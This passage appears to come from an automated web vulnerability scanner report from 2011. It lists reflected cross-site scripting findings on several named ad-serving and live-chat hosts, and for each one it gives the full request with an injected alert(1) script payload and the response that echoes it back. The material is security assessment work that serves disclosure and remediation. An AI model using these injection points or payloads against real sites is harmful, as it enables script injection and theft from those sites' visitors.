Last-Modified: Sat, 17 Sep 2011 00:52:41 GMT
Cache-Control: max-age=86400, private
Expires: Sun, 18 Sep 2011 00:52:41 GMT
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 00:52:41 GMT
Content-Length: 5217

//AG 13.0.0-21371 CM-1 (2011-09-16 13:59:30 UTC)
var rsi_now= new Date();
var rsi_csid= 'A10868';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da)
...[SNIP]...
ow[rsi_csid])window[rsi_csid].rsi_r();else rsi_r();
A10868.DM_addEncToLoc('ver', '2.2');
A10868.DM_addEncToLoc('clen','328');
A10868.DM_addEncToLoc('vid', '27200');
A10868.DM_addEncToLoc('pid', '2619505b443';alert(1)//a35e45272ee');
A10868.DM_addEncToLoc('pli', '3449146');
A10868.DM_addEncToLoc('sid', '2298003');
A10868.DM_addEncToLoc('ali', '3329023');
A10868.DM_addEncToLoc('cid', '10288627');
A10868.DM_addEncToLoc('p', '99
...[SNIP]...

4.127. http://js.revsci.net/gateway/gw.js [pli parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the pli request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 61d4e'%3balert(1)//bb7df706fb4 was submitted in the pli parameter. This input was echoed as 61d4e';alert(1)//bb7df706fb4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gateway/gw.js?auto=t&csid=A10868&ver=2.2&clen=328&vid=27200&pid=261950&pli=344914661d4e'%3balert(1)//bb7df706fb4&sid=2298003&ali=3329023&cid=10288627&p=99&ref=http%3A//www.tmz.com/& HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sat, 17 Sep 2011 00:52:42 GMT
Cache-Control: max-age=86400, private
Expires: Sun, 18 Sep 2011 00:52:42 GMT
X-Proc-ms: 1
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 00:52:41 GMT
Content-Length: 5218

//AG-develop 12.7.1-110 (2011-08-15 17:17:21 UTC)
var rsi_now= new Date();
var rsi_csid= 'A10868';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da
...[SNIP]...
e rsi_r();
A10868.DM_addEncToLoc('ver', '2.2');
A10868.DM_addEncToLoc('clen','328');
A10868.DM_addEncToLoc('vid', '27200');
A10868.DM_addEncToLoc('pid', '261950');
A10868.DM_addEncToLoc('pli', '344914661d4e';alert(1)//bb7df706fb4');
A10868.DM_addEncToLoc('sid', '2298003');
A10868.DM_addEncToLoc('ali', '3329023');
A10868.DM_addEncToLoc('cid', '10288627');
A10868.DM_addEncToLoc('p', '99');
A10868.DM_addEncToLoc('ref', 'http://
...[SNIP]...

4.128. http://js.revsci.net/gateway/gw.js [ref parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the ref request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce66b'%3balert(1)//a655a638949 was submitted in the ref parameter. This input was echoed as ce66b';alert(1)//a655a638949 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gateway/gw.js?auto=t&csid=A10868&ver=2.2&clen=328&vid=27200&pid=261950&pli=3449146&sid=2298003&ali=3329023&cid=10288627&p=99&ref=http%3A//www.tmz.com/ce66b'%3balert(1)//a655a638949& HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sat, 17 Sep 2011 00:52:53 GMT
Cache-Control: max-age=86400, private
Expires: Sun, 18 Sep 2011 00:52:53 GMT
X-Proc-ms: 1
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 00:52:52 GMT
Content-Length: 5218

//AG-develop 12.7.1-110 (2011-08-15 17:17:21 UTC)
var rsi_now= new Date();
var rsi_csid= 'A10868';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da
...[SNIP]...
M_addEncToLoc('sid', '2298003');
A10868.DM_addEncToLoc('ali', '3329023');
A10868.DM_addEncToLoc('cid', '10288627');
A10868.DM_addEncToLoc('p', '99');
A10868.DM_addEncToLoc('ref', 'http://www.tmz.com/ce66b';alert(1)//a655a638949');
if(window[rsi_csid])window[rsi_csid].DM_tag();else DM_tag();

4.129. http://js.revsci.net/gateway/gw.js [sid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the sid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fbb14'%3balert(1)//5c7df914983 was submitted in the sid parameter. This input was echoed as fbb14';alert(1)//5c7df914983 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gateway/gw.js?auto=t&csid=A10868&ver=2.2&clen=328&vid=27200&pid=261950&pli=3449146&sid=2298003fbb14'%3balert(1)//5c7df914983&ali=3329023&cid=10288627&p=99&ref=http%3A//www.tmz.com/& HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sat, 17 Sep 2011 00:52:45 GMT
Cache-Control: max-age=86400, private
Expires: Sun, 18 Sep 2011 00:52:45 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 00:52:44 GMT
Content-Length: 5218

//AG-develop 12.7.1-110 (2011-08-15 17:17:21 UTC)
var rsi_now= new Date();
var rsi_csid= 'A10868';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da
...[SNIP]...
2.2');
A10868.DM_addEncToLoc('clen','328');
A10868.DM_addEncToLoc('vid', '27200');
A10868.DM_addEncToLoc('pid', '261950');
A10868.DM_addEncToLoc('pli', '3449146');
A10868.DM_addEncToLoc('sid', '2298003fbb14';alert(1)//5c7df914983');
A10868.DM_addEncToLoc('ali', '3329023');
A10868.DM_addEncToLoc('cid', '10288627');
A10868.DM_addEncToLoc('p', '99');
A10868.DM_addEncToLoc('ref', 'http://www.tmz.com/');
if(window[rsi_csid])windo
...[SNIP]...

4.130. http://js.revsci.net/gateway/gw.js [ver parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the ver request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 31763'%3balert(1)//9a116341702 was submitted in the ver parameter. This input was echoed as 31763';alert(1)//9a116341702 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gateway/gw.js?auto=t&csid=A10868&ver=2.231763'%3balert(1)//9a116341702&clen=328&vid=27200&pid=261950&pli=3449146&sid=2298003&ali=3329023&cid=10288627&p=99&ref=http%3A//www.tmz.com/& HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sat, 17 Sep 2011 00:52:32 GMT
Cache-Control: max-age=86400, private
Expires: Sun, 18 Sep 2011 00:52:32 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 00:52:31 GMT
Content-Length: 5218

//AG-develop 12.7.1-110 (2011-08-15 17:17:21 UTC)
var rsi_now= new Date();
var rsi_csid= 'A10868';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da
...[SNIP]...
;}window[rsi_csid]=new rsiClient(rsi_csid);
if(window[rsi_csid])window[rsi_csid].rsi_ral(1);else rsi_ral(1);
if(window[rsi_csid])window[rsi_csid].rsi_r();else rsi_r();
A10868.DM_addEncToLoc('ver', '2.231763';alert(1)//9a116341702');
A10868.DM_addEncToLoc('clen','328');
A10868.DM_addEncToLoc('vid', '27200');
A10868.DM_addEncToLoc('pid', '261950');
A10868.DM_addEncToLoc('pli', '3449146');
A10868.DM_addEncToLoc('sid', '2298003');
...[SNIP]...

4.131. http://js.revsci.net/gateway/gw.js [vid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the vid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69e1a'%3balert(1)//d8a16318306 was submitted in the vid parameter. This input was echoed as 69e1a';alert(1)//d8a16318306 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gateway/gw.js?auto=t&csid=A10868&ver=2.2&clen=328&vid=2720069e1a'%3balert(1)//d8a16318306&pid=261950&pli=3449146&sid=2298003&ali=3329023&cid=10288627&p=99&ref=http%3A//www.tmz.com/& HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sat, 17 Sep 2011 00:52:40 GMT
Cache-Control: max-age=86400, private
Expires: Sun, 18 Sep 2011 00:52:40 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 00:52:39 GMT
Content-Length: 5218

//AG-develop 12.7.1-110 (2011-08-15 17:17:21 UTC)
var rsi_now= new Date();
var rsi_csid= 'A10868';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da
...[SNIP]...
sid].rsi_ral(1);else rsi_ral(1);
if(window[rsi_csid])window[rsi_csid].rsi_r();else rsi_r();
A10868.DM_addEncToLoc('ver', '2.2');
A10868.DM_addEncToLoc('clen','328');
A10868.DM_addEncToLoc('vid', '2720069e1a';alert(1)//d8a16318306');
A10868.DM_addEncToLoc('pid', '261950');
A10868.DM_addEncToLoc('pli', '3449146');
A10868.DM_addEncToLoc('sid', '2298003');
A10868.DM_addEncToLoc('ali', '3329023');
A10868.DM_addEncToLoc('cid', '1028
...[SNIP]...

4.132. http://livechat.iadvize.com/rpc/referrer.php [get parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://livechat.iadvize.com
Path:   /rpc/referrer.php

Issue detail

The value of the get request parameter is copied into the HTML document as plain text between tags. The payload 276c3<script>alert(1)</script>2f89cc1f134 was submitted in the get parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rpc/referrer.php?s=1821&get=276c3<script>alert(1)</script>2f89cc1f134&random=1316228161329 HTTP/1.1
Host: livechat.iadvize.com
Proxy-Connection: keep-alive
Referer: http://www.mailjet.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vuid=fc0d3bf4f99e190aeffd3c6b449e3ce04e736ab952c62; 1821vvc=3; 1821_idzp=%7B%22site_id%22%3A1821%2C%22chatcount%22%3A0%2C%22nbrVisite%22%3A2%2C%22country%22%3Anull%2C%22country_name%22%3A%22%22%2C%22city%22%3A%22%22%2C%22lat%22%3Anull%2C%22long%22%3Anull%2C%22lang%22%3A%22en%22%2C%22visitorname%22%3A%22+%22%2C%22extID%22%3Anull%2C%22pageview%22%3A1%2C%22connectionTime%22%3A1316210078%2C%22navTime%22%3A1000%7D; 1821_idz=XnclJ01Pg6id2FcJU13kUkMfaXVNV%2F8gxkjQn8hBPcG6LNaooz40h%2BMaW0hQlsjGSRD%2BkhBEQXtHEo8uNUWZDoUCReT5yO90BLxF%2FLlYyUr51FG%2FyyfLpChY7rUtOwVCw8l%2Fg3u5V7ZarDSzVOiKi6RLcJ2O

Response

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Fri, 16 Sep 2011 21:55:15 GMT
Content-Type: text/javascript; charset=utf-8
Connection: keep-alive
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: policyref="http://livechat.iadvize.com/w3c/p3p.xml", CP="NID DSP NON COR"
Set-Cookie: 1821_idzp=%7B%22site_id%22%3A1821%2C%22lang%22%3A%22en%22%2C%22pageview%22%3A3%2C%22referrer_lastPage%22%3A%22http%3A%5C%2F%5C%2Fwww.mailjet.com%5C%2Ffeatures%22%2C%22timeElapsed%22%3A21936835.17%2C%22navTime%22%3A1316210110000%2C%22origin_site%22%3A%22276c3%3Cscript%3Ealert%281%29%3C%5C%2Fscript%3E2f89cc1f134%22%2C%22origin%22%3A%22website%22%2C%22refengine%22%3A%22%22%2C%22refkeyword%22%3A%22%22%7D; path=/
Vary: Accept-Encoding
Content-Length: 215

iAdvize.vStats['origin_site'] = '276c3<script>alert(1)</script>2f89cc1f134';iAdvize.vStats['origin'] = 'website';iAdvize.vStats['refengine'] = '';iAdvize.vStats['refkeyword'] = '';iAdvize.util.delScript('referrer');

4.133. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/auditude_entertainment_video/preroll/vast/sx/ss/a/@x75 [REST URL parameter 10]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/auditude_entertainment_video/preroll/vast/sx/ss/a/@x75

Issue detail

The value of REST URL parameter 10 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35aa8"><script>alert(1)</script>e320abbb45e was submitted in the REST URL parameter 10. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/auditude_entertainment_video/preroll/vast/sx/ss/a/@x7535aa8"><script>alert(1)</script>e320abbb45e HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://adunit.cdn.auditude.com/flash/modules/display/AuditudeDisplayView.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:13:58 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 366
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0f45525d5f4f58455e445a4a423660;expires=Sat, 17-Sep-2011 01:14:58 GMT;path=/;httponly

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/auditude_entertainment_video/preroll/vast/sx/ss/a/256834064/x7535aa8"><script>alert(1)</script>e320abbb45e/default/empty.gif/4d686437616b357a3837594141787878?" target="_top">
...[SNIP]...

4.134. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/auditude_entertainment_video/preroll/vast/sx/ss/a/@x75 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/auditude_entertainment_video/preroll/vast/sx/ss/a/@x75

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d379f"><script>alert(1)</script>cdd4cac9c4c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/auditude_entertainment_videod379f"><script>alert(1)</script>cdd4cac9c4c/preroll/vast/sx/ss/a/@x75 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://adunit.cdn.auditude.com/flash/modules/display/AuditudeDisplayView.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:12:42 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 375
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0f45525d5f4f58455e445a4a423660;expires=Sat, 17-Sep-2011 01:13:42 GMT;path=/;httponly

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/auditude_entertainment_videod379f"><script>alert(1)</script>cdd4cac9c4c/preroll/vast/sx/ss/a/1859115549/x75/default/empty.gif/4d686437616b357a3837594141787878?" target="_top">
...[SNIP]...

4.135. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/auditude_news_video/preroll/vast/sx/ss/a/@x75 [REST URL parameter 10]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/auditude_news_video/preroll/vast/sx/ss/a/@x75

Issue detail

The value of REST URL parameter 10 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7095e"><script>alert(1)</script>372b13aff79 was submitted in the REST URL parameter 10. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/auditude_news_video/preroll/vast/sx/ss/a/@x757095e"><script>alert(1)</script>372b13aff79 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://adunit.cdn.auditude.com/flash/modules/display/AuditudeDisplayView.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:13:57 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 358
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0f45525d5f4f58455e445a4a423660;expires=Sat, 17-Sep-2011 01:14:57 GMT;path=/;httponly

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/auditude_news_video/preroll/vast/sx/ss/a/2010045325/x757095e"><script>alert(1)</script>372b13aff79/default/empty.gif/4d686437616b357a3837594141787878?" target="_top">
...[SNIP]...

4.136. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/auditude_news_video/preroll/vast/sx/ss/a/@x75 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/auditude_news_video/preroll/vast/sx/ss/a/@x75

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2129"><script>alert(1)</script>3d7659e830d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/auditude_news_videof2129"><script>alert(1)</script>3d7659e830d/preroll/vast/sx/ss/a/@x75 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://adunit.cdn.auditude.com/flash/modules/display/AuditudeDisplayView.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:12:43 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 364
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0f45525d5f4f58455e445a4a423660;expires=Sat, 17-Sep-2011 01:13:43 GMT;path=/;httponly

<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/auditude_news_videof2129"><script>alert(1)</script>3d7659e830d/preroll/vast/sx/ss/a/92301275/x75/default/empty.gif/4d686437616b357a3837594141787878?" target="_top">
...[SNIP]...

4.137. http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/129334548@x91 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/129334548@x91

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c158e"><script>alert(1)</script>74eb6653c9a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.comc158e"><script>alert(1)</script>74eb6653c9a/video/129334548@x91 HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; RMFD=011R4jGHO201yed8|O2021J3t|O3021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.35.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:52:54 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
ntCoent-Length: 363
Content-Type: text/html
Cache-Control: private
Content-Length: 363

<A HREF="http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.comc158e"><script>alert(1)</script>74eb6653c9a/video/1085717019/x91/default/empty.gif/4d686437616b357a2f4b554143616d4f?x" target="_top">
...[SNIP]...

4.138. http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/129334548@x91 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/129334548@x91

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6438"><script>alert(1)</script>21e8c03b3a3 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/videob6438"><script>alert(1)</script>21e8c03b3a3/129334548@x91 HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660; RMFD=011R4jGHO201yed8|O2021J3t|O3021J78|O2021J7A|O2021J7F|O10226KY|O20226Kk; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.35.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:53:12 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
ntCoent-Length: 363
Content-Type: text/html
Cache-Control: private
Content-Length: 363

<A HREF="http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/videob6438"><script>alert(1)</script>21e8c03b3a3/1734057116/x91/default/empty.gif/4d686437616b357a2f4b554143616d4f?x" target="_top">
...[SNIP]...

4.139. http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/129334548@x91 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/129334548@x91

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f12c6"><script>alert(1)</script>11ed6697784 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/129334548@x91f12c6"><script>alert(1)</script>11ed6697784 HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
